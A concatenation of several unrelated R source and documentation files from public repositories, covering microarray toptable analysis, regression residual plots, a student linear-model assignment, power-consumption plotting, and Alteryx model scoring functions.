visible(g1_1)<-TRUE
}
display()
}
if(cc!=0){
err<-try(ttx<<-toptable(datAgTwo2.f,coef=2,number=nrow(use.datAgTwo2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=3,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=4,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgTwo2.f,number=nrow(use.datAgTwo2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgTwo2.s<<-use.datAgTwo2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgTwo2.s<<-use.datAgTwo2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgTwo2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_TwoColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(dd!=0){
err<-try(ttx<<-toptable(datIllBA2.f,coef=2,number=nrow(use.datIllBA2.m2)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=3,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=4,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)toptable(datIllBA2.f,number=nrow(use.datIllBA2.m2))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datIllBA2.s<<-use.datIllBA2.m2[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datIllBA2.s<<-use.datIllBA2.m2[as.numeric(rn),],silent=TRUE)
if(length(datIllBA2.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Beadarray$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ee!=0){
err<-try(ttx<<-toptable(lumi_NQ.f,coef=2,number=nrow(use.lumi_NQ.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=3,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=4,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(lumi_NQ.f,number=nrow(use.lumi_NQ.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(lumi_NQ.s<<-use.lumi_NQ.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(lumi_NQ.s<<-use.lumi_NQ.m[as.numeric(rn),],silent=TRUE)
if(length(lumi_NQ.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Lumi$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ff!=0){
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=2,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=3,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=4,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_Nimblegen2.f,number=nrow(use.data.matrix_Nimblegen2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_Nimblegen2.s)!=0){
visible(g1_1)<-FALSE
l$Nimblegen$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(gg!=0){
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=2,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=3,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=4,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrixNorm.f,number=nrow(use.data.matrixNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrixNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrixNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrixNorm.s)!=0){
visible(g1_1)<-FALSE
l$Series_Matrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(hh!=0){
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=2,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=3,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=4,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_onlineNorm.f,number=nrow(use.data.matrix_onlineNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_onlineNorm.s)!=0){
visible(g1_1)<-FALSE
l$Online_Data$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/get_data_to_plot.R, R/helper.R
\name{prin_curve_loc}
\alias{prin_curve_loc}
\title{Principal curve locations}
\usage{
prin_curve_loc(D, ...)
prin_curve_loc(D, ...)
}
\arguments{
\item{D}{A square matrix of pairwise dissimilarities}
\item{...}{Other parameters for princurve::principal_curve function.}
\item{\\dots}{Other parameters for princurve::principal.curve function.}
\item{D}{A square matrix of pairwise dissimilarities}
}
\value{
A numeric vector of positions along the fitted principal curve.
A numeric vector of positions along the fitted principal curve.
}
\description{
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
}
| /man/prin_curve_loc.Rd | no_license | AsclepiusInformatica/buds | R | false | true | 873 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/get_data_to_plot.R, R/helper.R
\name{prin_curve_loc}
\alias{prin_curve_loc}
\title{Principal curve locations}
\usage{
prin_curve_loc(D, ...)
prin_curve_loc(D, ...)
}
\arguments{
\item{D}{A square matrix of pairwise dissimilarities}
\item{...}{Other parameters for princurve::principal_curve function.}
\item{\\dots}{Other parameters for princurve::principal.curve function.}
\item{D}{A square matrix of pairwise dissimilarities}
}
\value{
A numeric vector of positions along the fitted principal curve.
A numeric vector of positions along the fitted principal curve.
}
\description{
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
}
|
\name{residualPlots}
\alias{residualPlots}
\title{
Residual Plots for Linear Regression
}
\description{
Provides four plots based on residuals. Clockwise from upper left: 1. histogram of standardized residuals, 2. residuals vs. fitted values, 3. Standardized Residuals vs. Leverage (hat) values, and 4. Normal Probability Plot of Residuals.
}
\usage{
residualPlots(out, bigres = 3, bighat = 3, cutoff = 1)
}
\arguments{
\item{out}{output from \code{lm}}
\item{bigres}{cut-off for large std residuals}
\item{bighat}{multiple of mean leverage value to flag for large leverage}
\item{cutoff}{cut-off for Cooks Distance values}
}
\details{
yellow lines (if present) on leverage vs. std residuals plot indicate large residuals. Green line (if present) delimits large leverage values. Large red values (if present) indicate large Cooks Distance values. P-value for Anderson-Darling test of normality is indicated on normal probability plot.
}
\value{
\item{large_res}{indices of observations with large std residuals, if any}
\item{large_lever}{indices of observations with large leverage values, if any}
\item{large_CooksD}{indices of obserations with large Cooks Distance, if any}
}
\author{
Peter E. Rossi, Anderson School UCLA, \email{perossichi@gmail.com}
}
\examples{
data(Flat_Panel_TV)
out=residualPlots(lm(Flat_Panel_TV$Price~Flat_Panel_TV$Size))
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{Statistics}
\keyword{regression}
| /man/residualPlots.Rd | no_license | cran/PERregress | R | false | false | 1,507 | rd | \name{residualPlots}
\alias{residualPlots}
\title{
Residual Plots for Linear Regression
}
\description{
Provides four plots based on residuals. Clockwise from upper left: 1. histogram of standardized residuals, 2. residuals vs. fitted values, 3. Standardized Residuals vs. Leverage (hat) values, and 4. Normal Probability Plot of Residuals.
}
\usage{
residualPlots(out, bigres = 3, bighat = 3, cutoff = 1)
}
\arguments{
\item{out}{output from \code{lm}}
\item{bigres}{cut-off for large std residuals}
\item{bighat}{multiple of mean leverage value to flag for large leverage}
\item{cutoff}{cut-off for Cooks Distance values}
}
\details{
yellow lines (if present) on leverage vs. std residuals plot indicate large residuals. Green line (if present) delimits large leverage values. Large red values (if present) indicate large Cooks Distance values. P-value for Anderson-Darling test of normality is indicated on normal probability plot.
}
\value{
\item{large_res}{indices of observations with large std residuals, if any}
\item{large_lever}{indices of observations with large leverage values, if any}
\item{large_CooksD}{indices of obserations with large Cooks Distance, if any}
}
\author{
Peter E. Rossi, Anderson School UCLA, \email{perossichi@gmail.com}
}
\examples{
data(Flat_Panel_TV)
out=residualPlots(lm(Flat_Panel_TV$Price~Flat_Panel_TV$Size))
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{Statistics}
\keyword{regression}
|
# Assignment: ASSIGNMENT 6
# Name: Hoffmann, Laura
# Date: 7/04/2020
## Set the working directory to the root of your DSC 520 directory
setwd("~/RStudio/dsc520")
## Load the `data/r4ds/heights.csv` to
heights_df <- read.csv("data/r4ds/heights.csv")
## Load the ggplot2 library
library(ggplot2)
## Fit a linear model using the `age` variable as the predictor and `earn` as the outcome
age_lm <- lm(earn~age, data=heights_df)
## View the summary of your model using `summary()`
summary(age_lm)
## Creating predictions using `predict()`
age_predict_df <- data.frame(earn = predict(age_lm, heights_df), age = heights_df$age)
## Plot the predictions against the original data
ggplot(data = heights_df, aes(y = earn, x = age)) +
geom_point(color='blue') +
geom_line(color='red',data = age_predict_df, aes(y=earn, x=age))
mean_earn <- mean(heights_df$earn)
## Corrected Sum of Squares Total
sst <- sum((mean_earn - heights_df$earn)^2)
## Corrected Sum of Squares for Model
ssm <- sum((mean_earn - age_predict_df$earn)^2)
## Residuals
residuals <- heights_df$earn - age_predict_df$earn
## Sum of Squares for Error
sse <- sum(residuals^2)
## R Squared R^2 = SSM\SST
r_squared <- ssm/sst
## Number of observations
n <- nrow(age_predict_df)
## Number of regression parameters
p <- 2
## Corrected Degrees of Freedom for Model (p-1)
dfm <- p - 1
## Degrees of Freedom for Error (n-p)
dfe <- n - p
## Corrected Degrees of Freedom Total: DFT = n - 1
dft <- n - 1
## Mean of Squares for Model: MSM = SSM / DFM
msm <- ssm/dfm
## Mean of Squares for Error: MSE = SSE / DFE
mse <- sse/dfe
## Mean of Squares Total: MST = SST / DFT
mst <- sst/dft
## F Statistic F = MSM/MSE
f_score <- msm/mse
## Adjusted R Squared R2 = 1 - (1 - R2)(n - 1) / (n - p)
adjusted_r_squared <- 1-(1-r_squared)*dft/dfe
## Calculate the p-value from the F distribution
p_value <- pf(f_score, dfm, dft, lower.tail=F)
| /assignment_06_HoffmannLaura.R | no_license | LauraHoffmann-DataScience/DSC520 | R | false | false | 1,963 | r | # Assignment: ASSIGNMENT 6
# Name: Hoffmann, Laura
# Date: 7/04/2020
## Set the working directory to the root of your DSC 520 directory
setwd("~/RStudio/dsc520")
## Load the `data/r4ds/heights.csv` to
heights_df <- read.csv("data/r4ds/heights.csv")
## Load the ggplot2 library
library(ggplot2)
## Fit a linear model using the `age` variable as the predictor and `earn` as the outcome
age_lm <- lm(earn~age, data=heights_df)
## View the summary of your model using `summary()`
summary(age_lm)
## Creating predictions using `predict()`
age_predict_df <- data.frame(earn = predict(age_lm, heights_df), age = heights_df$age)
## Plot the predictions against the original data
ggplot(data = heights_df, aes(y = earn, x = age)) +
geom_point(color='blue') +
geom_line(color='red',data = age_predict_df, aes(y=earn, x=age))
mean_earn <- mean(heights_df$earn)
## Corrected Sum of Squares Total
sst <- sum((mean_earn - heights_df$earn)^2)
## Corrected Sum of Squares for Model
ssm <- sum((mean_earn - age_predict_df$earn)^2)
## Residuals
residuals <- heights_df$earn - age_predict_df$earn
## Sum of Squares for Error
sse <- sum(residuals^2)
## R Squared R^2 = SSM\SST
r_squared <- ssm/sst
## Number of observations
n <- nrow(age_predict_df)
## Number of regression parameters
p <- 2
## Corrected Degrees of Freedom for Model (p-1)
dfm <- p - 1
## Degrees of Freedom for Error (n-p)
dfe <- n - p
## Corrected Degrees of Freedom Total: DFT = n - 1
dft <- n - 1
## Mean of Squares for Model: MSM = SSM / DFM
msm <- ssm/dfm
## Mean of Squares for Error: MSE = SSE / DFE
mse <- sse/dfe
## Mean of Squares Total: MST = SST / DFT
mst <- sst/dft
## F Statistic F = MSM/MSE
f_score <- msm/mse
## Adjusted R Squared R2 = 1 - (1 - R2)(n - 1) / (n - p)
adjusted_r_squared <- 1-(1-r_squared)*dft/dfe
## Calculate the p-value from the F distribution
p_value <- pf(f_score, dfm, dft, lower.tail=F)
|
# code to prepare `gimei` dataset goes here
# from: 'https://github.com/willnet/gimei'
yaml <- (function() {
con <- url(
"https://raw.githubusercontent.com/willnet/gimei/main/lib/data/names.yml",
open = "r",
encoding = "UTF-8"
)
on.exit(close(con))
return(yaml::read_yaml(con))
})()
# 女性名だけしか使わない
gimei <- purrr::map_dfr(
yaml$first_name$female,
~ data.frame(
kanji = .[1],
hiragana = .[2],
katakana = .[3]
)
)
usethis::use_data(gimei, overwrite = TRUE)
| /data-raw/gimei.R | permissive | paithiov909/shaketoba | R | false | false | 517 | r | # code to prepare `gimei` dataset goes here
# from: 'https://github.com/willnet/gimei'
yaml <- (function() {
con <- url(
"https://raw.githubusercontent.com/willnet/gimei/main/lib/data/names.yml",
open = "r",
encoding = "UTF-8"
)
on.exit(close(con))
return(yaml::read_yaml(con))
})()
# 女性名だけしか使わない
gimei <- purrr::map_dfr(
yaml$first_name$female,
~ data.frame(
kanji = .[1],
hiragana = .[2],
katakana = .[3]
)
)
usethis::use_data(gimei, overwrite = TRUE)
|
library(clickstream)
### Name: readClickstreams
### Title: Reads a List of Clickstreams from File
### Aliases: readClickstreams
### ** Examples
clickstreams <- c("User1,h,c,c,p,c,h,c,p,p,c,p,p,o",
"User2,i,c,i,c,c,c,d",
"User3,h,i,c,i,c,p,c,c,p,c,c,i,d",
"User4,c,c,p,c,d",
"User5,h,c,c,p,p,c,p,p,p,i,p,o",
"User6,i,h,c,c,p,p,c,p,c,d")
csf <- tempfile()
writeLines(clickstreams, csf)
cls <- readClickstreams(csf, header = TRUE)
print(cls)
| /data/genthat_extracted_code/clickstream/examples/readClickstreams.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 523 | r | library(clickstream)
### Name: readClickstreams
### Title: Reads a List of Clickstreams from File
### Aliases: readClickstreams
### ** Examples
clickstreams <- c("User1,h,c,c,p,c,h,c,p,p,c,p,p,o",
"User2,i,c,i,c,c,c,d",
"User3,h,i,c,i,c,p,c,c,p,c,c,i,d",
"User4,c,c,p,c,d",
"User5,h,c,c,p,p,c,p,p,p,i,p,o",
"User6,i,h,c,c,p,p,c,p,c,d")
csf <- tempfile()
writeLines(clickstreams, csf)
cls <- readClickstreams(csf, header = TRUE)
print(cls)
|
## Course 4: Exploratory Data Analysis
## Asignment: Course Project 1
## Student: Brenda Cooney
## Plot: Plot 4
## Check to see if the data file exists in the current folder
## If it doesn't then download it else do not
## Note: I could bring this much further and check to ensure the file is readable
## but it's not part of the exercise so I'm leaving it out!
if(!file.exists("household_power_consumption.txt")) {
## Create a temporary file that will hold the zipped file
tempfile <- tempfile()
URL <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
## Download the zipped file, unzip and store the contents in the current directory
download.file(URL, tempfile, method = "curl")
unzip(tempfile)
unlink(tempfile) ## Remove the temporary file from memory
}
## Name of file in zipped folder
fileName <- "household_power_consumption.txt"
## Read the data in a data.frame and set it's column names and types
## Skip the first 66638 rows and then read in the data from rows where date is set to
## '2007-02-01' and '2007-02-02'
data <- read.table(file=fileName,
sep=";", col.names=c("Date", "Time", "Global_active_power",
"Global_reactive_power", "Voltage",
"Global_intensity", "Sub_metering_1",
"Sub_metering_2", "Sub_metering_3"),
colClasses = c("character", "character", "numeric",
"numeric", "numeric", "numeric",
"numeric", "numeric", "numeric"),
skip=66638,
nrows=2879,
stringsAsFactors = FALSE)
## Combine 'Date' and 'Time' and store result in a new column 'DateTime'
data_set_newCol <- cbind(data, DateTime=paste(data$Date, data$Time), stringsAsFactors = FALSE)
## Remove column 'Time' and 'Date'
data_set <- data_set_newCol[,3:10]
## Remove data no longer needed
remove(data, data_set_newCol)
## Set 'DateTime' to be of time 'Date'
data_set$DateTime <- strptime(data_set$DateTime, "%d/%m/%Y %H:%M:%S")
## Open 'graphics'png' device, create 'plot4.png' in working directoy
png(file="plot4.png", width = 480, height = 480, units="px")
## Specify the number of rows and columns to appear on the screen
par(mfrow=c(2,2))
## Create 'Plot1'
plot(data_set$DateTime, data_set$Global_active_power, type="l",
xlab="", ylab="Global Active Power")
## Create 'Plot2'
plot(data_set$DateTime, data_set$Voltage, type="l",
xlab="datetime", ylab="Voltage")
##Create 'Plot3'
plot(data_set$DateTime, data_set$Sub_metering_1, type="l",
xlab="", ylab="Energy sub metering")
legend("topright", legend=c("Sub_metering_1", "Sub_metering_2",
"Sub_metering_3"), bty="n", cex=1, lwd=1, col=c("black","red","blue"))
points(data_set$DateTime, data_set$Sub_metering_2, type="l", col = "red")
points(data_set$DateTime, data_set$Sub_metering_3, type="l", col = "blue")
## Create 'Plot4'
plot(data_set$DateTime, data_set$Global_reactive_power, type="l",
xlab="datetime", ylab="Global_reactive_power")
dev.off() ## Close the 'png' device that was opened above
| /r_code/plot4.R | no_license | brenda-cooney/ExData_Plotting1 | R | false | false | 3,304 | r | ## Course 4: Exploratory Data Analysis
## Asignment: Course Project 1
## Student: Brenda Cooney
## Plot: Plot 4
## Check to see if the data file exists in the current folder
## If it doesn't then download it else do not
## Note: I could bring this much further and check to ensure the file is readable
## but it's not part of the exercise so I'm leaving it out!
if(!file.exists("household_power_consumption.txt")) {
## Create a temporary file that will hold the zipped file
tempfile <- tempfile()
URL <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
## Download the zipped file, unzip and store the contents in the current directory
download.file(URL, tempfile, method = "curl")
unzip(tempfile)
unlink(tempfile) ## Remove the temporary file from memory
}
## Name of file in zipped folder
fileName <- "household_power_consumption.txt"
## Read the data in a data.frame and set it's column names and types
## Skip the first 66638 rows and then read in the data from rows where date is set to
## '2007-02-01' and '2007-02-02'
data <- read.table(file=fileName,
sep=";", col.names=c("Date", "Time", "Global_active_power",
"Global_reactive_power", "Voltage",
"Global_intensity", "Sub_metering_1",
"Sub_metering_2", "Sub_metering_3"),
colClasses = c("character", "character", "numeric",
"numeric", "numeric", "numeric",
"numeric", "numeric", "numeric"),
skip=66638,
nrows=2879,
stringsAsFactors = FALSE)
## Combine 'Date' and 'Time' and store result in a new column 'DateTime'
data_set_newCol <- cbind(data, DateTime=paste(data$Date, data$Time), stringsAsFactors = FALSE)
## Remove column 'Time' and 'Date'
data_set <- data_set_newCol[,3:10]
## Remove data no longer needed
remove(data, data_set_newCol)
## Set 'DateTime' to be of time 'Date'
data_set$DateTime <- strptime(data_set$DateTime, "%d/%m/%Y %H:%M:%S")
## Open 'graphics'png' device, create 'plot4.png' in working directoy
png(file="plot4.png", width = 480, height = 480, units="px")
## Specify the number of rows and columns to appear on the screen
par(mfrow=c(2,2))
## Create 'Plot1'
plot(data_set$DateTime, data_set$Global_active_power, type="l",
xlab="", ylab="Global Active Power")
## Create 'Plot2'
plot(data_set$DateTime, data_set$Voltage, type="l",
xlab="datetime", ylab="Voltage")
##Create 'Plot3'
plot(data_set$DateTime, data_set$Sub_metering_1, type="l",
xlab="", ylab="Energy sub metering")
legend("topright", legend=c("Sub_metering_1", "Sub_metering_2",
"Sub_metering_3"), bty="n", cex=1, lwd=1, col=c("black","red","blue"))
points(data_set$DateTime, data_set$Sub_metering_2, type="l", col = "red")
points(data_set$DateTime, data_set$Sub_metering_3, type="l", col = "blue")
## Create 'Plot4'
plot(data_set$DateTime, data_set$Global_reactive_power, type="l",
xlab="datetime", ylab="Global_reactive_power")
dev.off() ## Close the 'png' device that was opened above
|
rm(list = setdiff(ls(), lsf.str()))
setwd("/Users/tabuwalda/Documents/2015LearnLabSummerSchool/ShinyApp/LatencyLearningCurves/")
library(lme4)
library(dplyr)
options(dplyr.width = Inf)
source("helpers.r")
load("./Data/listKCShiny.Rdat")
oldModels <- NULL
cat("\n\n\n")
| /LatencyLearningCurves/global.r | no_license | TBuwalda/LatencyLC | R | false | false | 274 | r | rm(list = setdiff(ls(), lsf.str()))
setwd("/Users/tabuwalda/Documents/2015LearnLabSummerSchool/ShinyApp/LatencyLearningCurves/")
library(lme4)
library(dplyr)
options(dplyr.width = Inf)
source("helpers.r")
load("./Data/listKCShiny.Rdat")
oldModels <- NULL
cat("\n\n\n")
|
## rm(list=ls())
## set your own working directory
wd <- "C:/Users/Max/Dropbox/Health-IT/coursera/Data Science - Johns Hopkins University/Course 4 - Exploaratory Data Analysis"
setwd(wd)
data_dir <- "data"
if(!file.exists(data_dir)){dir.create(data_dir)}
setwd(file.path(wd,data_dir))
## Download data zip file and unzip it
##
fn <- "dataset.zip"
fUrl <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
download.file(fUrl,fn,method="curl")
unzip(zipfile=fn)
## Read data from the files into the variables
##
datafile <- "household_power_consumption.txt"
install.packages("sqldf")
library(sqldf)
hhpc <- read.csv.sql(datafile, sql="select * from file where `Date` In ('1/2/2007','2/2/2007')",header=TRUE,sep=";")
## Convert dates
datetime <- strptime(paste(hhpc$Date, hhpc$Time, sep=" "),"%d/%m/%Y %H:%M:%S")
hhpc$DT <- as.POSIXct(datetime)
| /plot_prepare_data.R | no_license | Camphausen/ExData_Plotting1 | R | false | false | 915 | r | ## rm(list=ls())
## set your own working directory
wd <- "C:/Users/Max/Dropbox/Health-IT/coursera/Data Science - Johns Hopkins University/Course 4 - Exploaratory Data Analysis"
setwd(wd)
data_dir <- "data"
if(!file.exists(data_dir)){dir.create(data_dir)}
setwd(file.path(wd,data_dir))
## Download data zip file and unzip it
##
fn <- "dataset.zip"
fUrl <- "https://d396qusza40orc.cloudfront.net/exdata%2Fdata%2Fhousehold_power_consumption.zip"
download.file(fUrl,fn,method="curl")
unzip(zipfile=fn)
## Read data from the files into the variables
##
datafile <- "household_power_consumption.txt"
install.packages("sqldf")
library(sqldf)
hhpc <- read.csv.sql(datafile, sql="select * from file where `Date` In ('1/2/2007','2/2/2007')",header=TRUE,sep=";")
## Convert dates
datetime <- strptime(paste(hhpc$Date, hhpc$Time, sep=" "),"%d/%m/%Y %H:%M:%S")
hhpc$DT <- as.POSIXct(datetime)
|
#' Score function
#'
#' @param mod.obj model object
#' @param new.data new data to score
#' @param score.field name given to the score field
#' @param ... additional arguments
#' @export
#' @author Ramnath Vaidyanathan, Dan Putler, Bridget Toomey
#' @rdname scoreModel
scoreModel <- function(mod.obj, new.data, score.field = "Score", ...) {
UseMethod('scoreModel')
}
#' @param os.value oversampling value
#' @param os.pct oversampling percent
#' @param pred.int whether to generate prediction intervals
#' @param int.vals interval values
#' @param log.y whether to report y on the log scale
#' @export
#' @rdname scoreModel
scoreModel.default <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...){
target.value <- os.value
new.data <- matchLevels(new.data, getXlevels(mod.obj))
y.levels <- getYlevels(mod.obj, new.data)
if (class(mod.obj) == "earth" && is.null(mod.obj$glm.list)) {
stop.Alteryx2("Spline Models that did not use a GLM family cannot be scored")
}
if (is.null(y.levels)) {
if(inherits(mod.obj, c("nnet.formula", "rpart", "svm"))){
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data)))
} else {
if (class(mod.obj)[1] == "gbm") {
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response", n.trees = mod.obj$best.trees)))
} else {
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response")))
}
}
names(scores) <- score.field
} else {
if (!is.null(os.value)) {
if (length(y.levels) != 2) {
AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
scores <- data.frame(predProb(mod.obj, newdata = new.data))
} else {
sample.pct <- samplePct(mod.obj, os.value, new.data)
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
pred.prob <- predProb(mod.obj, new.data)[ , (1:2)[y.levels == os.value]]
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
if (y.levels[1] == target.value) {
scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
} else {
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
} else {
scores <- data.frame(predProb(mod.obj, new.data))
}
names(scores) <- paste(score.field, "_", y.levels, sep = "")
}
scores
}
#' @export
scoreModel.glm <- scoreModel.default
#' @export
scoreModel.svyglm <- scoreModel.default
#' @export
scoreModel.negbin <- scoreModel.default
#' @export
#' @rdname scoreModel
scoreModel.lm <- function(mod.obj, new.data, score.field = "Score",
pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
if (pred.int) {
score <- as.data.frame(predict(mod.obj, newdata = new.data, level = 0.01*int.vals, interval = "predict"))
if (log.y) {
score$fit <- exp(score$fit)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
score$lwr <- exp(score$lwr)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
score$upr <- exp(score$upr)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
}
scores <- eval(parse(text = paste("data.frame(",score.field, "_fit = score$fit, ", score.field, "_lwr = score$lwr, ", score.field, "_upr = score$upr)", sep = "")))
} else {
score <- predict(mod.obj, newdata = new.data)
if (log.y) {
# The condition below checks to see if there are predicted values that
# would imply machine infinity when expotentiated. If this is the case
# a warning is given, and the smearing estimator is not applied. NOTE:
# to make this code work nicely in non-Alteryx environments, the
# AlteryxRDataX::AlteryxMessage call would need to be replaced with a message call
if (max(score) > 709) {
AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natural log transformed, no correction was applied.", iType = 2, iPriority = 3)
} else {
score <- exp(score)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
}
}
scores <- eval(parse(text = paste("data.frame(", score.field, " = score)")))
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLogit <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
new.data <- matchLevels(new.data, mod.obj$xlevels)
pred.prob <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "pred.prob")$pred.prob
if (!is.null(os.value)) {
target.value <- os.value
num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
num.total <- sum(mod.obj$yinfo$counts)
sample.pct <- 100*num.target / num.total
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
if (mod.obj$yinfo$levels == target.value) {
apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
scores <- data.frame(score1 = apr, score2 = 1 - apr)
} else {
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
} else {
scores <- data.frame(score1 = 1 - pred.prob, score2 = pred.prob)
}
names(scores) <- eval(parse(text = paste('c("', score.field, '_', mod.obj$yinfo$levels[1], '", "', score.field, '_', mod.obj$yinfo$levels[2], '")', sep="")))
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxGlm <- function(mod.obj, new.data, score.field = "Score", ...) {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
names(scores) <- score.field
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLinMod <- function(mod.obj, new.data, score.field = "Score", pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
if (pred.int) {
